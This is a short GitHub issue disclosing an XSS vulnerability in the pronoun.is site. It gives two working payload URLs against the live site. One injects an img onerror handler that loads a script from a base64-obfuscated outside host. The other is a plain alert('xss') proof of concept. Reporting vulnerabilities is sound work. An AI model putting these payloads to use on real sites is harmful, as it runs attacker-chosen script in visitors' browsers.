### ISSUE TITLE
XSS vulnerability

### ISSUE THREAD

**Issue by Lexicality** [witch-house/pronoun.is#28]
http://my.pronoun.is/john%20Cena/%3Cimg%20src=woof%20onerror=%22d=document,s=d.createElement%28'script'%29,s.src=atob%28'Ly9jZW5hLmphbWllaGFua2lucy5jby51ay9hbmRoaXNuYW1laXMvam9obmNlbmEuanM='%29,d.body.appendChild%28s%29%22%3E/his/his/xss

If you don't fancy clicking on what is admittedly a rather dodgy looking url (it's harmless, honest!) then http://my.pronoun.is/xss/%3Cimg%20src=xss%20onerror=alert%28'xss'%29%3E/xss/xss/xss also works.

**Comment by faissaloo** [comment]
10/10 m8 enjoyed that
